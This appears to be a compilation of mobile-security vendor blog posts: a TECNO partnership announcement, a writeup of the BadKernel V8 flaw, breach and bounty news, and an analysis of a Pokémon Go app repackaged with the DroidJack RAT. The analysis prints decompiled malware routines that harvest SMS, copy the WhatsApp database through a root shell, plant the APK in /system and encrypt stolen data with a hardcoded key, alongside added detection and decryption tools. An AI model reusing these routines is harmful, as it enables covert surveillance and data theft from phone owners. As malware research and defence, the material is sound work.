Trustlook Mobile Security Pre-installed on TECNO Phantom 6 and Phantom 6 Plus


Africa’s leading mobile device maker TECNO Mobile, a subsidiary of Transsion Holdings, has partnered with Trustlook, a next-generation mobile security company. Visit https://www.tecno-mobile.com to get the new Phantom 6, now pre-loaded with the Trustlook Mobile Security & Antivirus app.

Over the last decade, TECNO Mobile has dominated the African mobile market to become one of the most sought-after mobile brands in the region. TECNO consistently produces high-end smartphones, and the latest additions to the Phantom series, the Phantom 6 and Phantom 6 Plus, are no exception. The Phantom 6 Plus even offers TECNO Mobile’s first tri-fold security combination (fingerprint sensor, eye scanner and Trustlook Mobile Security behavioral protection).

Trustlook’s technology protects more than 300M users globally through its integration with leading apps and through downloadable security offerings. It significantly reduces the window of exposure to new threats through machine learning and behavioral analysis.

BadKernel Vulnerability Technical Details

Researchers from Qihoo 360’s Alpha Team have recently uncovered a vulnerability that affects millions of Android phones.  It is especially widespread in China and can cause significant damage, and it has been assigned CNNVD-201608-414 in the China National Vulnerability Database of Information Security (CNNVD), the Chinese counterpart of the US Common Vulnerabilities and Exposures (CVE) system.

The vulnerability lies in the part of the Chrome V8 engine responsible for JavaScript parsing.  It allows an attacker to hijack the phone and remotely execute malicious code, which can invade the user’s privacy by accessing the camera and microphone, and steal sensitive information such as credit card numbers and passwords.

The flaw exists in versions 3.20 to 4.2 of the V8 engine. The observe_accept_invalid exception type was mistakenly spelled observe_invalid_accept (see the V8 source); because of that error the internal kMessages object becomes reachable from script, which gives an attacker a path to download and execute malicious code.

Versions of Tencent’s X5.SDK library that integrate V8 3.20 to 4.2 are also affected.  X5.SDK is used by many popular apps in China, such as mobile QQ, QQ Space, Jingdong, 58 City, Sohu and Sina News, and the app versions built on those SDK releases are exposed to the attack.

Any app that runs on Android 4.4.4 through 5.1 and uses the WebView component is also vulnerable, because the system WebView on those releases is built on an affected V8.

The exploit is delivered primarily through social engineering, such as an email carrying a shared link from an infected friend’s account, or an instant message that claims to come from a well-known source.  Once the user opens the link, the device is infected with malicious code, often without any visible sign.

To check if a phone is infected

What to do if you are infected?

    • Upgrade to the latest phone software (firmware/OS update from the vendor)
    • Upgrade any browsers you have downloaded
    • Be wary of emails and messages with links, even from people or organizations you know.  Never click an unfamiliar URL; type it into the browser’s address bar instead.
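A device-side check for the WebView version, added here as an example that is not part of the original post or of Trustlook’s app: it reads the system WebView’s default user agent (WebSettings.getDefaultUserAgent, available since API 17) and compares the Chromium major version against the V8 range given above. The post states the range in V8 versions; the mapping used here (Chromium 30 carried V8 3.20, Chromium 42 carried V8 4.2) is an assumption not stated on the page, and the class and constant names are the example’s own.

```java
import android.content.Context;
import android.os.Build;
import android.webkit.WebSettings;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Added example: flags a system WebView whose Chromium build falls in the affected V8 range. */
public final class WebViewVersionCheck {

    // The page gives the affected range as V8 3.20 to 4.2. The WebView user agent only
    // carries the Chromium version, so we assume Chromium 30 shipped V8 3.20 and
    // Chromium 42 shipped V8 4.2 (assumption; the page does not state this mapping).
    static final int FIRST_AFFECTED_CHROMIUM = 30;
    static final int LAST_AFFECTED_CHROMIUM = 42;

    // A Chromium-based WebView reports e.g. "... Chrome/39.0.0.0 Mobile Safari/537.36".
    private static final Pattern CHROME_TOKEN = Pattern.compile("Chrome/(\\d+)\\.");

    /** Extracts the Chromium major version from a WebView user agent, or -1 if there is none. */
    static int chromiumMajor(String userAgent) {
        if (userAgent == null) return -1;
        Matcher m = CHROME_TOKEN.matcher(userAgent);
        if (!m.find()) return -1;        // pre-Chromium WebView (Android before 4.4) has no Chrome/ token
        try {
            return Integer.parseInt(m.group(1));
        } catch (NumberFormatException e) {
            return -1;
        }
    }

    /** True when the version sits inside the range the post calls vulnerable. */
    static boolean inAffectedRange(int chromiumMajor) {
        return chromiumMajor >= FIRST_AFFECTED_CHROMIUM && chromiumMajor <= LAST_AFFECTED_CHROMIUM;
    }

    /** Call from an app with its Context; returns a one-line verdict suitable for logging. */
    public static String report(Context ctx) {
        String ua = WebSettings.getDefaultUserAgent(ctx);
        int major = chromiumMajor(ua);
        StringBuilder sb = new StringBuilder();
        sb.append("Android ").append(Build.VERSION.RELEASE)
          .append(", WebView Chromium ").append(major < 0 ? "unknown" : String.valueOf(major))
          .append(": ");
        if (major < 0) {
            sb.append("no Chromium token in the user agent; treat as an unpatched legacy WebView");
        } else if (inAffectedRange(major)) {
            sb.append("inside the affected range; update the system WebView or firmware");
        } else {
            sb.append("outside the affected range");
        }
        return sb.toString();
    }
}
```

The stock WebView on the firmware releases the post names reports a Chromium version inside this range; a WebView that has been updated through Google Play (possible from Android 5.0 on) reports a newer one and passes. A user agent with no Chrome/ token means a pre-Chromium WebView, which the check deliberately flags for a firmware update rather than passing.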

Google Offers $200,000 to Find Android Vulnerabilities

“Show me the money” might become the new motto of the hacking world, and with good reason. Google has announced it will offer up to $200,000 to the first team that finds a bug chain giving remote access to multiple Android devices while knowing only their email address or phone number.

Announced by Google’s Project Zero research team, the contest began on September 14, 2016 and is scheduled to run through March 14, 2017. Researchers are invited to find critical bugs in Android, specifically on Nexus 6P and Nexus 5X devices running the current builds for each device.

This offer is largely a response to QuadRooter, the widespread Android vulnerability disclosed in August 2016 that affected an estimated 900 million devices.

Google is banking on the prize money motivating researchers to find flaws in the ecosystem. First prize is $200,000, second prize $100,000 and third prize $50,000, with additional awards for entries that find other flaws in Google’s operating system.

800,000 Identities Stolen From Adult Porn Site Brazzers

Usernames, email addresses and passwords for some 800,000 accounts have been exposed in the latest big-name data leak, this time from the porn network Brazzers. That is the number of email addresses retrieved by security monitoring firm Vigilante; the leaked data is also said to contain the plain-text passwords and usernames associated with those emails.

Although Brazzers says the data comes from an old hack, it is not taking chances and has temporarily shut down its forum while it investigates for any new breach.

There are a couple of ways to check whether you were part of this breach: use the Identity Check feature in the Trustlook Mobile Security app, or use the Have I Been Pwned website.

Beyond that, affected users should change their password, and since the passwords leaked in plain text, change it on any other site where the same password was reused.

Trustlook Mobile Security SDK Whitepaper Now Available

The Trustlook Mobile Security SDK is a robust, feature-packed, multi-layered security framework for building mobile security apps. Learn how you can use the SDK to build your own security app with the newly released whitepaper, and see how GO Security used Trustlook’s SDK to build one of the most popular security apps in the Google Play store.

Download here:
http://www.trustlook.com/sdk_whitepaper/

Pokémon Go Bundled with Malicious Remote Administration Tool DroidJack

Because of Pokémon Go’s exploding popularity, the app has attracted more attention from attackers than ever: a popular game is an efficient carrier for spreading malicious apps. Trustlook recently discovered a Pokémon Go app repackaged with the remote administration tool (RAT) DroidJack. The app looks like the normal game but can be used to control the user’s device. The repackaged Trojan can be identified by the following characteristics:

  • MD5: d350cc8222792097317608ea95b283a8
  • SHA256: 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4
  • Size: 184036 bytes
  • App name: 61029052
  • Package name: com.nianticlabs.pokemongo

While running, the app is indistinguishable from the genuine Pokémon Go app (screenshots in the original post).


The app is signed with a certificate that does not belong to the Pokémon Go developer (the certificate details are shown in a screenshot in the original post).

In the decompiled code structure (screenshot in the original post) the package “net.droidjack.server” can be found.
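A small triage tool, added here as an example and not code from Trustlook or from the original post, that checks an APK against the three indicators above: the SHA-256 of the file, the presence of net.droidjack.server type descriptors in classes.dex, and the SHA-256 fingerprint of the v1 signing certificate in META-INF. The genuine developer’s fingerprint is not on the page, so EXPECTED_SIGNER_SHA256 is a placeholder to be filled from a known-good copy of the game; the class and method names are the example’s own.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.cert.Certificate;
import java.security.cert.CertificateFactory;
import java.util.ArrayList;
import java.util.Enumeration;
import java.util.List;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

/** Added example: triage an APK against the indicators listed in the post. */
public final class ApkTriage {

    // Whole-file SHA-256 of the repackaged sample, from the indicator list above.
    static final String SAMPLE_SHA256 =
        "15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4";

    // DEX type-descriptor prefix for the net.droidjack.server package. Class names are
    // stored as plain strings inside classes.dex, so a byte search is enough for triage.
    static final byte[] DROIDJACK_DESCRIPTOR =
        "Lnet/droidjack/server/".getBytes(StandardCharsets.US_ASCII);

    // SHA-256 fingerprint of the genuine developer's signing certificate. The post only
    // shows the bogus signer, so this is a placeholder to fill from a known-good APK.
    static final String EXPECTED_SIGNER_SHA256 = "<fill in from a genuine Pokémon Go APK>";

    static String hex(byte[] b) {
        StringBuilder sb = new StringBuilder(b.length * 2);
        for (byte x : b) sb.append(String.format("%02x", x));
        return sb.toString();
    }

    static byte[] readAll(InputStream in) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buf = new byte[8192];
        int n;
        while ((n = in.read(buf)) != -1) out.write(buf, 0, n);
        return out.toByteArray();
    }

    /** Whole-file SHA-256, to compare with the published IOC. */
    static String fileSha256(String path) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        try (InputStream in = new FileInputStream(path)) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) != -1) md.update(buf, 0, n);
        }
        return hex(md.digest());
    }

    static int indexOf(byte[] hay, byte[] needle) {
        outer:
        for (int i = 0; i + needle.length <= hay.length; i++) {
            for (int j = 0; j < needle.length; j++) if (hay[i + j] != needle[j]) continue outer;
            return i;
        }
        return -1;
    }

    /** True if any classes*.dex entry references the DroidJack server package. */
    static boolean dexMentionsDroidJack(ZipFile apk) throws IOException {
        Enumeration<? extends ZipEntry> e = apk.entries();
        while (e.hasMoreElements()) {
            ZipEntry entry = e.nextElement();
            String name = entry.getName();
            if (!name.startsWith("classes") || !name.endsWith(".dex")) continue;
            if (indexOf(readAll(apk.getInputStream(entry)), DROIDJACK_DESCRIPTOR) >= 0) return true;
        }
        return false;
    }

    /** SHA-256 fingerprints of the signer certificates in the v1 (JAR) signature blocks, which are PKCS#7. */
    static List<String> signerFingerprints(ZipFile apk) throws Exception {
        List<String> out = new ArrayList<>();
        CertificateFactory cf = CertificateFactory.getInstance("X.509");
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        Enumeration<? extends ZipEntry> e = apk.entries();
        while (e.hasMoreElements()) {
            ZipEntry entry = e.nextElement();
            String name = entry.getName();
            if (!name.startsWith("META-INF/")) continue;
            if (!(name.endsWith(".RSA") || name.endsWith(".DSA") || name.endsWith(".EC"))) continue;
            byte[] block = readAll(apk.getInputStream(entry));
            for (Certificate c : cf.generateCertificates(new ByteArrayInputStream(block)))
                out.add(hex(md.digest(c.getEncoded())));
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        String path = args[0];
        System.out.println("sha256 matches published sample: " + SAMPLE_SHA256.equals(fileSha256(path)));
        try (ZipFile apk = new ZipFile(path)) {
            System.out.println("net.droidjack.server in dex: " + dexMentionsDroidJack(apk));
            for (String fp : signerFingerprints(apk))
                System.out.println("signer sha256 " + fp
                    + (fp.equals(EXPECTED_SIGNER_SHA256) ? " (expected signer)" : " (NOT the expected signer)"));
        }
    }
}
```

Run it as java ApkTriage sample.apk. It only reads v1 (JAR) signature blocks, which is what 2016-era APKs carry; an APK signed only with the v2 scheme reports no signer. A descriptor hit is a strong indicator, but a miss is not a clearance, since a repackager can rename the package before building the DEX.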

The DroidJack RAT can perform the following malicious activities:

  • Get SMS messages
  • Monitor/record calls
  • Get call logs
  • Read browser bookmarks/history
  • Get WhatsApp call logs
  • Get GPS location
  • Read WhatsApp chats
  • Record sound
  • Capture video
  • Take pictures
  • Send device information
  • Install its own APK into the system folder
  • Update itself

 

The following code snippets are responsible for collecting SMS messages; a() reads the sent folder and b() the inbox (the single-letter names are obfuscation preserved by the decompiler):

  // Dumps content://sms/sent into the collector object "ag".
  protected void a()
  {
    ag localag = new ag(this.c);
    localag.b();
    Object localObject = Uri.parse("content://sms/sent");
    Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);
    if (localCursor.getCount() > 0) {}   // empty branch left behind by the decompiler
    for (;;)
    {
      if (!localCursor.moveToNext()) {
        return;
      }
      String str3 = localCursor.getString(localCursor.getColumnIndex("body"));
      String str1 = localCursor.getString(localCursor.getColumnIndex("address"));
      String str4 = localCursor.getString(localCursor.getColumnIndex("date"));
      String str2 = a(str1);   // a(String) looks up a label for the address; null if none
      localObject = str2;
  […]

  // Same routine for content://sms/inbox.
  protected void b()
  {
    ag localag = new ag(this.c);
    localag.a();
    Object localObject = Uri.parse("content://sms/inbox");
    Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);
    if (localCursor.getCount() > 0) {}
    for (;;)
    {
      if (!localCursor.moveToNext()) {
        return;
      }
      String str3 = localCursor.getString(localCursor.getColumnIndex("body"));
      String str1 = localCursor.getString(localCursor.getColumnIndex("address"));
      String str2 = a(str1);
      localObject = str2;
      if (str2 == null) {
        localObject = str1;   // no label: fall back to the raw address
      }
      // address, label, body, date
      localag.a(str1, (String)localObject, str3, localCursor.getString(localCursor.getColumnIndex("date")));
    }
  }

 

The following code snippet is used to retrieve the WhatsApp message database. It pipes commands into a root shell (su), so it only succeeds on a rooted device:

  protected byte[] a()
  {
    try
    {
      // Destination on external storage, readable by the RAT without root.
      this.d = new File(Environment.getExternalStorageDirectory() + "/WhatsApp/Databases/wams.db");
      // Open a root shell and feed it commands through stdin.
      Object localObject = new DataOutputStream(Runtime.getRuntime().exec("su").getOutputStream());
      ((DataOutputStream)localObject).writeBytes("cp data/data/com.whatsapp/databases/msgstore.db " + this.d.getAbsolutePath());
      ((DataOutputStream)localObject).writeBytes("\nexit");
      Thread.sleep(10000L);   // wait for the copy to finish
      if (this.d.exists()) {}   // empty branch left behind by the decompiler
      return "NoWA".getBytes();
    }

 

The following code snippet is used to install the RAT’s own APK into the system folder, again through su, so that it persists as a system app (the hardcoded yaffs2 partition on /dev/block/mtdblock3 is a relic of old handsets and fails on devices with other partition layouts):

  public class FBDBSender
  ...
  protected byte[] c()
  {
    try
    {
      // Path of this app's own APK (flag 128 = PackageManager.GET_META_DATA).
      Object localObject = new File(this.a.getPackageManager().getApplicationInfo(this.a.getPackageName(), 128).sourceDir);
      DataOutputStream localDataOutputStream = new DataOutputStream(Runtime.getRuntime().exec("su").getOutputStream());
      // Remount /system read-write, copy the APK into /system/app, remount read-only.
      localDataOutputStream.writeBytes("mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system\n");
      localDataOutputStream.writeBytes("cp -rp " + ((File)localObject).getAbsolutePath() + " /system/app/" + ((File)localObject).getName());
      localDataOutputStream.writeBytes("\nmount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system");
      localDataOutputStream.writeBytes("\nexit");
      Thread.sleep(10000L);
      localObject = "Ack".getBytes();
      return localObject;
    }


The malware may encrypt the collected data with AES before sending it out. The key is hardcoded (the 16 bytes are the ASCII string “LRSANJUISTHERAJA”), and Cipher.getInstance(“AES”) with no mode or padding resolves to AES/ECB/PKCS5Padding, so anyone holding the sample can decrypt its traffic:

  import java.security.Key;
  import javax.crypto.Cipher;
  import javax.crypto.spec.SecretKeySpec;
  import android.util.Base64;

  public class aj
  {
    // 16-byte AES-128 key, hardcoded in the APK.
    private static final byte[] a = { 76, 82, 83, 65, 78, 74, 85, 73, 83, 84, 72, 69, 82, 65, 74, 65 };

    // Encrypt and base64-encode (1 == Cipher.ENCRYPT_MODE).
    public static String a(String paramString) throws Exception
    {
      Key localKey = a();
      Cipher localCipher = Cipher.getInstance("AES");
      localCipher.init(1, localKey);
      return Base64.encodeToString(localCipher.doFinal(paramString.getBytes()), 0);
    }

    private static Key a()
    {
      return new SecretKeySpec(a, "AES");
    }

    // Base64-decode and decrypt (2 == Cipher.DECRYPT_MODE).
    public static String b(String paramString) throws Exception
    {
      Key localKey = a();
      Cipher localCipher = Cipher.getInstance("AES");
      localCipher.init(2, localKey);
      return new String(localCipher.doFinal(Base64.decode(paramString, 0)));
    }
  }
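An analyst-side counterpart to class aj, added here as an example (not part of the original post or of the malware): it reuses the hardcoded key to decrypt captured values, spells out the AES/ECB/PKCS5Padding transformation that Cipher.getInstance(“AES”) resolves to, and shows why ECB under a static key is also a detection opportunity. The sample record strings are constructed for the demo, and the class and method names are the example’s own.

```java
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Base64;
import java.util.HashSet;
import java.util.Set;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

/** Added example: decrypt data protected by the aj class above, and show the ECB leak. */
public final class DroidJackCrypto {

    // The key bytes from aj.a, which spell the ASCII string "LRSANJUISTHERAJA".
    static final byte[] KEY = "LRSANJUISTHERAJA".getBytes(StandardCharsets.US_ASCII);

    // aj calls Cipher.getInstance("AES"); both the JDK and Android providers expand that
    // to AES/ECB/PKCS5Padding. Name it explicitly so the tool does not depend on a default.
    static final String TRANSFORMATION = "AES/ECB/PKCS5Padding";

    static Cipher cipher(int mode) throws Exception {
        Cipher c = Cipher.getInstance(TRANSFORMATION);
        c.init(mode, new SecretKeySpec(KEY, "AES"));
        return c;
    }

    /** Mirrors aj.a(): AES-ECB encrypt, then base64. Used here only to build sample input. */
    static String encrypt(String plaintext) throws Exception {
        byte[] ct = cipher(Cipher.ENCRYPT_MODE).doFinal(plaintext.getBytes(StandardCharsets.UTF_8));
        // MIME encoding wraps lines, like android.util.Base64.DEFAULT does on the device.
        return Base64.getMimeEncoder().encodeToString(ct);
    }

    /** Mirrors aj.b() for a captured value. The MIME decoder tolerates the line breaks
     *  that android.util.Base64.DEFAULT inserts every 76 characters. */
    static String decrypt(String b64) throws Exception {
        byte[] ct = Base64.getMimeDecoder().decode(b64);
        return new String(cipher(Cipher.DECRYPT_MODE).doFinal(ct), StandardCharsets.UTF_8);
    }

    /** ECB leaks structure: identical 16-byte plaintext blocks give identical ciphertext blocks. */
    static boolean hasRepeatedBlocks(byte[] ct) {
        Set<String> seen = new HashSet<>();
        for (int i = 0; i + 16 <= ct.length; i += 16) {
            if (!seen.add(Arrays.toString(Arrays.copyOfRange(ct, i, i + 16)))) return true;
        }
        return false;
    }

    public static void main(String[] args) throws Exception {
        if (args.length > 0) {
            // Decrypt a captured base64 value given on the command line.
            System.out.println(decrypt(args[0]));
            return;
        }
        // Constructed sample, not real captured traffic: two identical 16-byte records.
        String record = "sms|+1555000123|";   // exactly 16 bytes, one AES block
        String exfil = encrypt(record + record + "hello");
        System.out.println("ciphertext (base64):\n" + exfil);
        System.out.println("decrypted: " + decrypt(exfil));
        byte[] raw = Base64.getMimeDecoder().decode(exfil);
        System.out.println("repeated ECB blocks: " + hasRepeatedBlocks(raw));
    }
}
```

Run it with no arguments for the built-in demo, or pass a captured base64 string to decrypt it. For the constructed input, hasRepeatedBlocks returns true because the two identical 16-byte records encrypt to identical ciphertext blocks under ECB; the same repetition appears in real exfiltration whenever records share a block-aligned prefix, which is something a network signature can key on even without decrypting.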

   

Summary

Installing apps from third-party sources may expose your device to threats; downloading only from a trusted source is the simplest way to keep a device secure. Note that in this sample the WhatsApp theft and the /system persistence both go through su, so they only succeed on a rooted device, while the SMS, location and recording features need nothing more than the permissions granted at install. Installing a security app such as Trustlook Mobile Security & Antivirus also helps prevent identity theft and keeps you safe online.